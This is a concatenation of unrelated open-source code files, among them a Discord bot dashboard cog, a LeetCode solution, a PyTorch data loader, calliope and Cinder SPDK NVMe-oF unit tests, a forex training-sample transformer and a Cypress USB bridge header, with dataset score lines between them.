class CompositeMetaClass(type(commands.Cog), type(ABC)):
"""This allows the metaclass used for proper type detection to coexist with discord.py's
metaclass."""
# Thanks to Flare for showing how to use group commands across multiple files. If this breaks, it's his fault
class Dashboard(
DashboardRolesMixin,
DashboardWebserverMixin,
DashboardSettingsMixin,
DBMixin,
commands.Cog,
metaclass=CompositeMetaClass,
):
__version__ = "0.1.6a"
def __init__(self, bot: Red, *args, **kwargs):
super().__init__(*args, **kwargs)
self.bot = bot
self.config = Config.get_conf(self, identifier=473541068378341376)
self.config.register_global(
secret="[Not set]",
redirect="http://127.0.0.1:42356/callback",
clientid=0,
blacklisted=[],
disallowedperms=[],
support="",
defaultcolor="red",
meta={"title": "", "icon": "", "description": "", "color": ""},
)
self.config.register_guild(roles=[])
self.configcache = defaultdict(self.cache_defaults)
self.rpc = DashboardRPC(self)
def cog_unload(self):
self.configcache.clear()
self.rpc.unload()
def cache_defaults(self):
return {"roles": []}
async def initialize(self):
config = await self.config.all_guilds()
for k, v in config.items():
self.configcache[k] = v
| 2.078125 | 2 |
algorithms/162.Find-Peak-Element/Python/solution_2.py | hopeness/leetcode | 0 | 6953 | <gh_stars>0
"""
https://leetcode.com/problems/find-peak-element/submissions/
"""
from typing import List
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
l, r = 0, len(nums)-1
while l < r:
lmid = (l + r) // 2
rmid = lmid + 1
if nums[lmid] < nums[rmid]:
l = lmid + 1
else:
r = rmid - 1
return l
| 3.09375 | 3 |
data_loader.py | vinbigdata-medical/MIDL2021-Xray-Classification | 4 | 6954 | from torchvision.datasets import ImageFolder
from torchvision import transforms
import random
import os
import torch
from torch.utils.data.dataloader import DataLoader
from utils import constants, get_default_device
from image_folder_with_path import ImageFolderWithPaths
def to_device(data, device):
"""Move tensor(s) to chosen device"""
if isinstance(data, (list, tuple)):
return [to_device(x, device) for x in data]
return data.to(device, non_blocking=True)
class DeviceDataLoader():
""" wrap a Dataloader to move data to a device """
def __init__(self, dl, device):
self.dl = dl
self.device = device
def __iter__(self):
""" yield a batch of data after moving it to device """
for b in self.dl:
yield to_device(b, self.device)
def __len__(self):
""" return number of batch size """
return len(self.dl)
default_device = get_default_device.default_device
train_transforms = transforms.Compose([
transforms.RandomHorizontalFlip(p=0.5),
transforms.RandomRotation(degrees=random.uniform(5, 10)),
transforms.Resize((512, 512)),
transforms.ToTensor(),
])
test_transforms = transforms.Compose([
transforms.Resize((512, 512)),
transforms.ToTensor(),
])
classes = os.listdir(constants.DATA_PATH + constants.TRAIN_PATH)
training_dataset = ImageFolder(constants.DATA_PATH + constants.TRAIN_PATH, transform=train_transforms)
valid_dataset = ImageFolder(constants.DATA_PATH + constants.VAL_PATH, transform=test_transforms)
# testing_dataset = ImageFolder(constants.DATA_PATH + constants.TEST_PATH, transform=test_transforms)
# training_dataset = ImageFolderWithPaths(constants.DATA_PATH + constants.TRAIN_PATH, transform=train_transforms)
# valid_dataset = ImageFolderWithPaths(constants.DATA_PATH + constants.VAL_PATH, transform=test_transforms)
testing_dataset = ImageFolderWithPaths(constants.DATA_PATH + constants.TEST_PATH, transform=test_transforms)
torch.manual_seed(constants.RANDOM_SEED)
train_dl = DataLoader(training_dataset, constants.BATCH_SIZE, shuffle=True, num_workers=8, pin_memory=True)
val_dl = DataLoader(valid_dataset, constants.BATCH_SIZE, num_workers=8, pin_memory=True)
test_dl = DataLoader(testing_dataset, constants.BATCH_SIZE, num_workers=8, pin_memory=True)
"""
Now we can wrap our training and validation data loaders using DeviceDataLoader for automatically transferring batches
of data to GPU (if available), and use to_device to move our model to GPU (if available)
"""
train_dl = DeviceDataLoader(train_dl, default_device)
val_dl = DeviceDataLoader(val_dl, default_device)
test_dl = DeviceDataLoader(test_dl, default_device) | 2.734375 | 3 |
calliope/test/test_analysis.py | sjpfenninger/calliope | 1 | 6955 | # import matplotlib
# matplotlib.use('Qt5Agg') # Prevents `Invalid DISPLAY variable` errors
import pytest
import tempfile
from calliope import Model
from calliope.utils import AttrDict
from calliope import analysis
from . import common
from .common import assert_almost_equal, solver, solver_io
import matplotlib.pyplot as plt
plt.switch_backend('agg') # Prevents `Invalid DISPLAY variable` errors
class TestModel:
@pytest.fixture(scope='module')
def model(self):
locations = """
locations:
1:
techs: ['ccgt', 'demand_power']
override:
ccgt:
constraints:
e_cap.max: 100
demand_power:
constraints:
r: -50
metadata:
map_boundary: [-10, 35, 5, 45]
location_coordinates:
1: [40, -2]
links:
"""
config_run = """
mode: plan
model: ['{techs}', '{locations}']
subset_t: ['2005-01-01', '2005-01-02']
"""
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(locations.encode('utf-8'))
f.read()
override_dict = AttrDict({
'solver': solver,
'solver_io': solver_io,
})
model = common.simple_model(config_run=config_run,
config_locations=f.name,
override=override_dict)
model.run()
return model
@pytest.fixture(scope='module')
def builtin_model(self):
model = Model()
model.run()
return model
def test_plot_carrier_production(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_carrier_production(model.solution)
def test_plot_timeseries(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_timeseries(model.solution,
model.solution['e'].loc[dict(c='power')].sum(dim='x'),
carrier='power', demand='demand_power')
def test_plot_installed_capacities(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_installed_capacities(model.solution)
def test_plot_transmission(self, model):
# Just make sure this doesn't raise any exceptions
analysis.plot_transmission(model.solution, map_resolution='c')
def test_get_delivered_cost(self, model):
# TODO this should be tested with a more complex model
assert_almost_equal(analysis.get_delivered_cost(model.solution), 0.1)
def test_get_levelized_cost(self, model):
lcoe = analysis.get_levelized_cost(model.solution)
assert_almost_equal(lcoe.at['ccgt'], 0.1)
def test_get_group_share(self, model):
# TODO this should be tested with a more complex model
share = analysis.get_group_share(model.solution, techs=['ccgt'])
assert share == 1.0
def test_get_unmet_demand_hours(self, builtin_model):
# TODO this should be tested with a more complex model
unmet = analysis.get_unmet_demand_hours(builtin_model.solution)
assert unmet == 1
def test_recompute_levelized_costs(self, model):
# Cost in solution
sol = model.solution
assert_almost_equal(sol['summary'].to_pandas().loc['ccgt', 'levelized_cost_monetary'], 0.1)
# Recomputed cost must be the same
dm = analysis.SolutionModel(model.solution)
recomputed = dm.recompute_levelized_costs('ccgt')
assert_almost_equal(recomputed['total'], 0.1)
def test_recompute_levelized_costs_after_changes(self, model):
# Make changes
dm = analysis.SolutionModel(model.solution)
dm.config_model.techs.ccgt.costs.monetary.e_cap = 50
dm.config_model.techs.ccgt.costs.monetary.om_fuel = 1.0
# Recomputed cost
recomputed = dm.recompute_levelized_costs('ccgt')
assert_almost_equal(recomputed['total'], 1.0, tolerance=0.001)
| 2.03125 | 2 |
mol/data/reader.py | TzuTingWei/mol | 0 | 6956 | <reponame>TzuTingWei/mol
import os
from mol.util import read_xyz
dirname = os.path.dirname(os.path.abspath(__file__))
filename = os.path.join(dirname, 'look_and_say.dat')
with open(filename, 'r') as handle:
look_and_say = handle.read()
def get_molecule(filename):
return read_xyz(os.path.join(dirname, filename + ".xyz"))
| 2.890625 | 3 |
cinder/tests/unit/targets/test_spdknvmf.py | lightsey/cinder | 3 | 6957 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
from unittest import mock
from cinder import test
from cinder.volume import configuration as conf
from cinder.volume.targets import spdknvmf as spdknvmf_driver
BDEVS = [{
"num_blocks": 4096000,
"name": "Nvme0n1",
"driver_specific": {
"nvme": {
"trid": {
"trtype": "PCIe",
"traddr": "0000:00:04.0"
},
"ns_data": {
"id": 1
},
"pci_address": "0000:00:04.0",
"vs": {
"nvme_version": "1.1"
},
"ctrlr_data": {
"firmware_revision": "1.0",
"serial_number": "deadbeef",
"oacs": {
"ns_manage": 0,
"security": 0,
"firmware": 0,
"format": 0
},
"vendor_id": "0x8086",
"model_number": "QEMU NVMe Ctrl"
},
"csts": {
"rdy": 1,
"cfs": 0
}
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": True,
"unmap": False,
"read": True,
"write_zeroes": False,
"write": True,
"flush": True,
"nvme_io": True
},
"claimed": False,
"block_size": 512,
"product_name": "NVMe disk",
"aliases": ["Nvme0n1"]
}, {
"num_blocks": 8192,
"uuid": "70efd305-4e66-49bd-99ff-faeda5c3052d",
"aliases": [
"Nvme0n1p0"
],
"driver_specific": {
"lvol": {
"base_bdev": "Nvme0n1",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": False
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Split Disk",
"name": "Nvme0n1p0"
}, {
"num_blocks": 8192,
"uuid": "70efd305-4e66-49bd-99ff-faeda5c3052d",
"aliases": [
"Nvme0n1p1"
],
"driver_specific": {
"lvol": {
"base_bdev": "Nvme0n1",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": False
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Split Disk",
"name": "Nvme0n1p1"
}, {
"num_blocks": 8192,
"uuid": "70efd305-4e66-49bd-99ff-faeda5c3052d",
"aliases": [
"lvs_test/lvol0"
],
"driver_specific": {
"lvol": {
"base_bdev": "Malloc0",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": False
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Logical Volume",
"name": "58b17014-d4a1-4f85-9761-093643ed18f1_4294967297"
}, {
"num_blocks": 8192,
"uuid": "8dec1964-d533-41df-bea7-40520efdb416",
"aliases": [
"lvs_test/lvol1"
],
"driver_specific": {
"lvol": {
"base_bdev": "Malloc0",
"lvol_store_uuid": "58b17014-d4a1-4f85-9761-093643ed18f1",
"thin_provision": True
}
},
"supported_io_types": {
"reset": True,
"nvme_admin": False,
"unmap": True,
"read": True,
"write_zeroes": True,
"write": True,
"flush": False,
"nvme_io": False
},
"claimed": False,
"block_size": 4096,
"product_name": "Logical Volume",
"name": "58b17014-d4a1-4f85-9761-093643ed18f1_4294967298"
}]
NVMF_SUBSYSTEMS = [{
"listen_addresses": [],
"subtype": "Discovery",
"nqn": "nqn.2014-08.org.nvmexpress.discovery",
"hosts": [],
"allow_any_host": True
}, {
"listen_addresses": [],
"subtype": "NVMe",
"hosts": [{
"nqn": "nqn.2016-06.io.spdk:init"
}],
"namespaces": [{
"bdev_name": "Nvme0n1p0",
"nsid": 1,
"name": "Nvme0n1p0"
}],
"allow_any_host": False,
"serial_number": "SPDK00000000000001",
"nqn": "nqn.2016-06.io.spdk:cnode1"
}, {
"listen_addresses": [],
"subtype": "NVMe",
"hosts": [],
"namespaces": [{
"bdev_name": "Nvme1n1p0",
"nsid": 1,
"name": "Nvme1n1p0"
}],
"allow_any_host": True,
"serial_number": "SPDK00000000000002",
"nqn": "nqn.2016-06.io.spdk:cnode2"
}]
class JSONRPCException(Exception):
def __init__(self, message):
self.message = message
class JSONRPCClient(object):
def __init__(self, addr=None, port=None):
self.methods = {"bdev_get_bdevs": self.get_bdevs,
"construct_nvmf_subsystem":
self.construct_nvmf_subsystem,
"nvmf_delete_subsystem": self.delete_nvmf_subsystem,
"nvmf_create_subsystem": self.nvmf_subsystem_create,
"nvmf_subsystem_add_listener":
self.nvmf_subsystem_add_listener,
"nvmf_subsystem_add_ns":
self.nvmf_subsystem_add_ns,
"nvmf_get_subsystems": self.get_nvmf_subsystems}
self.bdevs = copy.deepcopy(BDEVS)
self.nvmf_subsystems = copy.deepcopy(NVMF_SUBSYSTEMS)
def __del__(self):
pass
def get_bdevs(self, params=None):
if params and 'name' in params:
for bdev in self.bdevs:
for alias in bdev['aliases']:
if params['name'] in alias:
return json.dumps({"result": [bdev]})
if bdev['name'] == params['name']:
return json.dumps({"result": [bdev]})
return json.dumps({"error": "Not found"})
return json.dumps({"result": self.bdevs})
def get_nvmf_subsystems(self, params=None):
return json.dumps({"result": self.nvmf_subsystems})
def construct_nvmf_subsystem(self, params=None):
nvmf_subsystem = {
"listen_addresses": [],
"subtype": "NVMe",
"hosts": [],
"namespaces": [{
"bdev_name": "Nvme1n1p0",
"nsid": 1,
"name": "Nvme1n1p0"
}],
"allow_any_host": True,
"serial_number": params['serial_number'],
"nqn": params['nqn']
}
self.nvmf_subsystems.append(nvmf_subsystem)
return json.dumps({"result": nvmf_subsystem})
def delete_nvmf_subsystem(self, params=None):
found_id = -1
i = 0
for nvmf_subsystem in self.nvmf_subsystems:
if nvmf_subsystem['nqn'] == params['nqn']:
found_id = i
i += 1
if found_id != -1:
del self.nvmf_subsystems[found_id]
return json.dumps({"result": {}})
def nvmf_subsystem_create(self, params=None):
nvmf_subsystem = {
"namespaces": [],
"nqn": params['nqn'],
"serial_number": "S0000000000000000001",
"allow_any_host": False,
"subtype": "NVMe",
"hosts": [],
"listen_addresses": []
}
self.nvmf_subsystems.append(nvmf_subsystem)
return json.dumps({"result": nvmf_subsystem})
def nvmf_subsystem_add_listener(self, params=None):
for nvmf_subsystem in self.nvmf_subsystems:
if nvmf_subsystem['nqn'] == params['nqn']:
nvmf_subsystem['listen_addresses'].append(
params['listen_address']
)
return json.dumps({"result": ""})
def nvmf_subsystem_add_ns(self, params=None):
for nvmf_subsystem in self.nvmf_subsystems:
if nvmf_subsystem['nqn'] == params['nqn']:
nvmf_subsystem['namespaces'].append(
params['namespace']
)
return json.dumps({"result": ""})
def call(self, method, params=None):
req = {}
req['jsonrpc'] = '2.0'
req['method'] = method
req['id'] = 1
if (params):
req['params'] = params
response = json.loads(self.methods[method](params))
if not response:
return {}
if 'error' in response:
msg = "\n".join(["Got JSON-RPC error response",
"request:",
json.dumps(req, indent=2),
"response:",
json.dumps(response['error'], indent=2)])
raise JSONRPCException(msg)
return response['result']
class Target(object):
def __init__(self, name="Nvme0n1p0"):
self.name = name
class SpdkNvmfDriverTestCase(test.TestCase):
def setUp(self):
super(SpdkNvmfDriverTestCase, self).setUp()
self.configuration = mock.Mock(conf.Configuration)
self.configuration.target_ip_address = '192.168.0.1'
self.configuration.target_port = '4420'
self.configuration.target_prefix = ""
self.configuration.nvmet_port_id = "1"
self.configuration.nvmet_ns_id = "fake_id"
self.configuration.nvmet_subsystem_name = "nqn.2014-08.io.spdk"
self.configuration.target_protocol = "nvmet_rdma"
self.configuration.spdk_rpc_ip = "127.0.0.1"
self.configuration.spdk_rpc_port = 8000
self.driver = spdknvmf_driver.SpdkNvmf(configuration=
self.configuration)
self.jsonrpcclient = JSONRPCClient()
def test__get_spdk_volume_name(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
bdevs = self.driver._rpc_call("bdev_get_bdevs")
bdev_name = bdevs[0]['name']
volume_name = self.driver._get_spdk_volume_name(bdev_name)
self.assertEqual(bdev_name, volume_name)
volume_name = self.driver._get_spdk_volume_name("fake")
self.assertIsNone(volume_name)
def test__get_nqn_with_volume_name(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
nqn = self.driver._get_nqn_with_volume_name("Nvme0n1p0")
nqn_tmp = self.driver._rpc_call("nvmf_get_subsystems")[1]['nqn']
self.assertEqual(nqn, nqn_tmp)
nqn = self.driver._get_nqn_with_volume_name("fake")
self.assertIsNone(nqn)
def test__get_first_free_node(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
free_node = self.driver._get_first_free_node()
self.assertEqual(3, free_node)
def test_create_nvmeof_target(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
subsystems_first = self.driver._rpc_call("nvmf_get_subsystems")
self.driver.create_nvmeof_target("Nvme0n1p1",
"nqn.2016-06.io.spdk",
"192.168.0.1",
4420, "rdma", -1, -1, "")
subsystems_last = self.driver._rpc_call("nvmf_get_subsystems")
self.assertEqual(len(subsystems_first) + 1, len(subsystems_last))
def test_delete_nvmeof_target(self):
with mock.patch.object(self.driver, "_rpc_call",
self.jsonrpcclient.call):
subsystems_first = self.driver._rpc_call("nvmf_get_subsystems")
target = Target()
self.driver.delete_nvmeof_target(target)
subsystems_last = self.driver._rpc_call("nvmf_get_subsystems")
self.assertEqual(len(subsystems_first) - 1, len(subsystems_last))
target.name = "fake"
self.driver.delete_nvmeof_target(target)
self.assertEqual(len(subsystems_first) - 1, len(subsystems_last))
| 1.523438 | 2 |
server/algos/euler/transformer.py | yizhang7210/Acre | 2 | 6958 | """ This is algos.euler.transformer module.
This module is responsible for transforming raw candle data into training
samples usable by the Euler algorithm.
"""
import datetime
import decimal
from algos.euler.models import training_samples as ts
from core.models import instruments
from datasource.models import candles
TWO_PLACES = decimal.Decimal('0.01')
def extract_features(day_candle):
""" Extract the features for the learning algorithm from a daily candle.
The Features are:
high_bid, low_bid, close_bid, open_ask, high_ask, low_ask,
and close_ask (all relative to open_bid) in pips.
Args:
day_candle: candles.Candle object representing a daily candle.
Returns:
features: List of Decimals. The features described above, all in two
decimal places.
"""
multiplier = day_candle.instrument.multiplier
features = [
day_candle.high_bid,
day_candle.low_bid,
day_candle.close_bid,
day_candle.open_ask,
day_candle.high_ask,
day_candle.low_ask,
day_candle.close_ask,
]
features = [multiplier * (x - day_candle.open_bid) for x in features]
features = [decimal.Decimal(x).quantize(TWO_PLACES) for x in features]
return features
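# Worked example (hypothetical candle, multiplier assumed to be 10000): with open_bid=1.10000
# and high_bid=1.10080, the high_bid feature is (1.10080 - 1.10000) * 10000 = 8.00 pips.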
def get_profitable_change(day_candle):
""" Get the potential daily profitable price change in pips.
If prices rise enough, we have: close_bid - open_ask (> 0), buy.
If prices fall enough, we have: close_ask - open_bid (< 0), sell.
if prices stay relatively still, we don't buy or sell. It's 0.
Args:
day_candle: candles.Candle object representing a daily candle.
Returns:
profitable_change: Decimal. The profitable rate change described
above, in two decimal places.
"""
multiplier = day_candle.instrument.multiplier
change = 0
if day_candle.close_bid > day_candle.open_ask:
change = multiplier * (day_candle.close_bid - day_candle.open_ask)
elif day_candle.close_ask < day_candle.open_bid:
change = multiplier * (day_candle.close_ask - day_candle.open_bid)
return decimal.Decimal(change).quantize(TWO_PLACES)
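# Worked example (hypothetical candle, multiplier assumed to be 10000): with open_ask=1.10020
# and close_bid=1.10150, prices rose enough, so the profitable change is
# (1.10150 - 1.10020) * 10000 = 13.00 pips (a buy).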
def build_sample_row(candle_previous, candle_next):
""" Build one training sample from two consecutive days of candles.
Args:
candle_previous: candles.Candle object. Candle of first day.
candle_next: candles.Candle object. Candle of second day.
Returns:
sample: TrainingSample object. One training sample for learning.
"""
return ts.create_one(
instrument=candle_next.instrument,
date=candle_next.start_time.date() + datetime.timedelta(1),
features=extract_features(candle_previous),
target=get_profitable_change(candle_next))
def get_start_time(instrument):
""" Get the start time for retrieving candles of the given instrument.
This is determined by the last training sample in the database.
Args:
instrument: Instrument object. The given instrument.
Returns:
start_time: Datetime object. The datetime from which to query
            candles to fill the rest of the training samples.
"""
last_sample = ts.get_last(instrument)
if last_sample is not None:
start_date = last_sample.date - datetime.timedelta(1)
return datetime.datetime.combine(start_date, datetime.time())
return datetime.datetime(2005, 1, 1)
def run():
""" Update the training samples in the database from the latest candles.
This should be run daily to ensure the training set is up-to-date.
Args:
None.
"""
all_new_samples = []
for instrument in instruments.get_all():
start_time = get_start_time(instrument)
new_candles = candles.get_candles(
instrument=instrument, start=start_time, order_by='start_time')
for i in range(len(new_candles) - 1):
all_new_samples.append(
build_sample_row(new_candles[i], new_candles[i + 1]))
ts.insert_many(all_new_samples)
| 3.171875 | 3 |
diagrams/outscale/__init__.py | analyticsftw/diagrams | 17,037 | 6959 | <reponame>analyticsftw/diagrams<filename>diagrams/outscale/__init__.py
from diagrams import Node
class _Outscale(Node):
_provider = "outscale"
_icon_dir = "resources/outscale"
fontcolor = "#ffffff"
| 1.375 | 1 |
misc/python/mango/application/main_driver/logstream.py | pymango/pymango | 3 | 6960 | __doc__ = \
"""
=======================================================================================
Main-driver :obj:`LogStream` variables (:mod:`mango.application.main_driver.logstream`)
=======================================================================================
.. currentmodule:: mango.application.main_driver.logstream
Logging objects/attributes for :obj:`mango.application.main_driver.MainDriverFilter` filters.
Classes
=======
.. autosummary::
:toctree: generated/
LogStream - Message logging for :obj:`mango.application.main_driver.MainDriverFilter` filters.
Attributes
==========
.. autodata:: log
.. autodata:: mstLog
.. autodata:: mstOut
.. autodata:: warnLog
.. autodata:: errLog
"""
import mango
import mango.mpi as mpi
import os
import os.path
import sys
if sys.platform.startswith('linux'):
import DLFCN as dl
_flags = sys.getdlopenflags()
sys.setdlopenflags(dl.RTLD_NOW|dl.RTLD_GLOBAL)
from . import _mango_main_driver as _mango_main_driver_so
sys.setdlopenflags(_flags)
else:
from . import _mango_main_driver as _mango_main_driver_so
from mango.core import LogStream
#: Messages sent to stdout, prefixed with :samp:`'P<RANK>'`, where :samp:`<RANK>` is MPI process world rank.
log = _mango_main_driver_so._log
#: Messages sent to stdout, prefixed with :samp:`'MST'`, and messages also saved to history-meta-data.
mstLog = _mango_main_driver_so._mstLog
#: Messages sent to stdout, prefixed with :samp:`'OUT'`.
mstOut = _mango_main_driver_so._mstOut
#: Messages sent to stderr, prefixed with :samp:`'WARNING'`.
warnLog = _mango_main_driver_so._warnLog
#: Messages sent to stderr, prefixed with :samp:`'ERROR'`.
errLog = _mango_main_driver_so._errLog
__all__ = [s for s in dir() if not s.startswith('_')]
| 1.867188 | 2 |
ucdev/cy7c65211/header.py | luftek/python-ucdev | 11 | 6961 | # -*- coding: utf-8-unix -*-
import platform
######################################################################
# Platform specific headers
######################################################################
if platform.system() == 'Linux':
src = """
typedef bool BOOL;
"""
######################################################################
# Common headers
######################################################################
src += """
#define CY_STRING_DESCRIPTOR_SIZE 256
#define CY_MAX_DEVICE_INTERFACE 5
#define CY_US_VERSION_MAJOR 1
#define CY_US_VERSION_MINOR 0
#define CY_US_VERSION_PATCH 0
#define CY_US_VERSION 1
#define CY_US_VERSION_BUILD 74
typedef unsigned int UINT32;
typedef unsigned char UINT8;
typedef unsigned short UINT16;
typedef char CHAR;
typedef unsigned char UCHAR;
typedef void* CY_HANDLE;
typedef void (*CY_EVENT_NOTIFICATION_CB_FN)(UINT16 eventsNotified);
typedef struct _CY_VID_PID {
UINT16 vid;
UINT16 pid;
} CY_VID_PID, *PCY_VID_PID;
typedef struct _CY_LIBRARY_VERSION {
UINT8 majorVersion;
UINT8 minorVersion;
UINT16 patch;
UINT8 buildNumber;
} CY_LIBRARY_VERSION, *PCY_LIBRARY_VERSION;
typedef struct _CY_FIRMWARE_VERSION {
UINT8 majorVersion;
UINT8 minorVersion;
UINT16 patchNumber;
UINT32 buildNumber;
} CY_FIRMWARE_VERSION, *PCY_FIRMWARE_VERSION;
typedef enum _CY_DEVICE_CLASS{
CY_CLASS_DISABLED = 0,
CY_CLASS_CDC = 0x02,
CY_CLASS_PHDC = 0x0F,
CY_CLASS_VENDOR = 0xFF
} CY_DEVICE_CLASS;
typedef enum _CY_DEVICE_TYPE {
CY_TYPE_DISABLED = 0,
CY_TYPE_UART,
CY_TYPE_SPI,
CY_TYPE_I2C,
CY_TYPE_JTAG,
CY_TYPE_MFG
} CY_DEVICE_TYPE;
typedef enum _CY_DEVICE_SERIAL_BLOCK
{
SerialBlock_SCB0 = 0,
SerialBlock_SCB1,
SerialBlock_MFG
} CY_DEVICE_SERIAL_BLOCK;
typedef struct _CY_DEVICE_INFO {
CY_VID_PID vidPid;
UCHAR numInterfaces;
UCHAR manufacturerName [256];
UCHAR productName [256];
UCHAR serialNum [256];
UCHAR deviceFriendlyName [256];
CY_DEVICE_TYPE deviceType [5];
CY_DEVICE_CLASS deviceClass [5];
CY_DEVICE_SERIAL_BLOCK deviceBlock;
} CY_DEVICE_INFO,*PCY_DEVICE_INFO;
typedef struct _CY_DATA_BUFFER {
UCHAR *buffer;
UINT32 length;
UINT32 transferCount;
} CY_DATA_BUFFER,*PCY_DATA_BUFFER;
typedef enum _CY_RETURN_STATUS{
CY_SUCCESS = 0,
CY_ERROR_ACCESS_DENIED,
CY_ERROR_DRIVER_INIT_FAILED,
CY_ERROR_DEVICE_INFO_FETCH_FAILED,
CY_ERROR_DRIVER_OPEN_FAILED,
CY_ERROR_INVALID_PARAMETER,
CY_ERROR_REQUEST_FAILED,
CY_ERROR_DOWNLOAD_FAILED,
CY_ERROR_FIRMWARE_INVALID_SIGNATURE,
CY_ERROR_INVALID_FIRMWARE,
CY_ERROR_DEVICE_NOT_FOUND,
CY_ERROR_IO_TIMEOUT,
CY_ERROR_PIPE_HALTED,
CY_ERROR_BUFFER_OVERFLOW,
CY_ERROR_INVALID_HANDLE,
CY_ERROR_ALLOCATION_FAILED,
CY_ERROR_I2C_DEVICE_BUSY,
CY_ERROR_I2C_NAK_ERROR,
CY_ERROR_I2C_ARBITRATION_ERROR,
CY_ERROR_I2C_BUS_ERROR,
CY_ERROR_I2C_BUS_BUSY,
CY_ERROR_I2C_STOP_BIT_SET,
CY_ERROR_STATUS_MONITOR_EXIST
} CY_RETURN_STATUS;
typedef struct _CY_I2C_CONFIG{
UINT32 frequency;
UINT8 slaveAddress;
BOOL isMaster;
BOOL isClockStretch;
} CY_I2C_CONFIG,*PCY_I2C_CONFIG;
typedef struct _CY_I2C_DATA_CONFIG
{
UCHAR slaveAddress;
BOOL isStopBit;
BOOL isNakBit;
} CY_I2C_DATA_CONFIG, *PCY_I2C_DATA_CONFIG;
typedef enum _CY_SPI_PROTOCOL {
CY_SPI_MOTOROLA = 0,
CY_SPI_TI,
CY_SPI_NS
} CY_SPI_PROTOCOL;
typedef struct _CY_SPI_CONFIG
{
UINT32 frequency;
UCHAR dataWidth;
CY_SPI_PROTOCOL protocol ;
BOOL isMsbFirst;
BOOL isMaster;
BOOL isContinuousMode;
BOOL isSelectPrecede;
BOOL isCpha;
BOOL isCpol;
}CY_SPI_CONFIG,*PCY_SPI_CONFIG;
typedef enum _CY_UART_BAUD_RATE
{
CY_UART_BAUD_300 = 300,
CY_UART_BAUD_600 = 600,
CY_UART_BAUD_1200 = 1200,
CY_UART_BAUD_2400 = 2400,
CY_UART_BAUD_4800 = 4800,
CY_UART_BAUD_9600 = 9600,
CY_UART_BAUD_14400 = 14400,
CY_UART_BAUD_19200 = 19200,
CY_UART_BAUD_38400 = 38400,
CY_UART_BAUD_56000 = 56000,
CY_UART_BAUD_57600 = 57600,
CY_UART_BAUD_115200 = 115200,
CY_UART_BAUD_230400 = 230400,
CY_UART_BAUD_460800 = 460800,
CY_UART_BAUD_921600 = 921600,
CY_UART_BAUD_1000000 = 1000000,
CY_UART_BAUD_3000000 = 3000000,
}CY_UART_BAUD_RATE;
typedef enum _CY_UART_PARITY_MODE {
CY_DATA_PARITY_DISABLE = 0,
CY_DATA_PARITY_ODD,
CY_DATA_PARITY_EVEN,
CY_DATA_PARITY_MARK,
CY_DATA_PARITY_SPACE
} CY_UART_PARITY_MODE;
typedef enum _CY_UART_STOP_BIT {
CY_UART_ONE_STOP_BIT = 1,
CY_UART_TWO_STOP_BIT
} CY_UART_STOP_BIT;
typedef enum _CY_FLOW_CONTROL_MODES {
CY_UART_FLOW_CONTROL_DISABLE = 0,
CY_UART_FLOW_CONTROL_DSR,
CY_UART_FLOW_CONTROL_RTS_CTS,
CY_UART_FLOW_CONTROL_ALL
} CY_FLOW_CONTROL_MODES;
typedef struct _CY_UART_CONFIG {
CY_UART_BAUD_RATE baudRate;
UINT8 dataWidth;
CY_UART_STOP_BIT stopBits;
CY_UART_PARITY_MODE parityMode;
BOOL isDropOnRxErrors;
} CY_UART_CONFIG,*PCY_UART_CONFIG;
typedef enum _CY_CALLBACK_EVENTS {
CY_UART_CTS_BIT = 0x01,
CY_UART_DSR_BIT = 0x02,
CY_UART_BREAK_BIT = 0x04,
CY_UART_RING_SIGNAL_BIT = 0x08,
CY_UART_FRAME_ERROR_BIT = 0x10,
CY_UART_PARITY_ERROR_BIT = 0x20,
CY_UART_DATA_OVERRUN_BIT = 0x40,
CY_UART_DCD_BIT = 0x100,
CY_SPI_TX_UNDERFLOW_BIT = 0x200,
CY_SPI_BUS_ERROR_BIT = 0x400,
CY_ERROR_EVENT_FAILED_BIT = 0x800
} CY_CALLBACK_EVENTS;
CY_RETURN_STATUS CyLibraryInit ();
CY_RETURN_STATUS CyLibraryExit ();
CY_RETURN_STATUS CyGetListofDevices (
UINT8* numDevices
);
CY_RETURN_STATUS CyGetDeviceInfo(
UINT8 deviceNumber,
CY_DEVICE_INFO *deviceInfo
);
CY_RETURN_STATUS CyGetDeviceInfoVidPid (
CY_VID_PID vidPid,
UINT8 *deviceIdList,
CY_DEVICE_INFO *deviceInfoList,
UINT8 *deviceCount,
UINT8 infoListLength
);
CY_RETURN_STATUS CyOpen (
UINT8 deviceNumber,
UINT8 interfaceNum,
CY_HANDLE *handle
);
CY_RETURN_STATUS CyClose (
CY_HANDLE handle
);
CY_RETURN_STATUS CyCyclePort (
CY_HANDLE handle
);
CY_RETURN_STATUS CySetGpioValue (
CY_HANDLE handle,
UINT8 gpioNumber,
UINT8 value
);
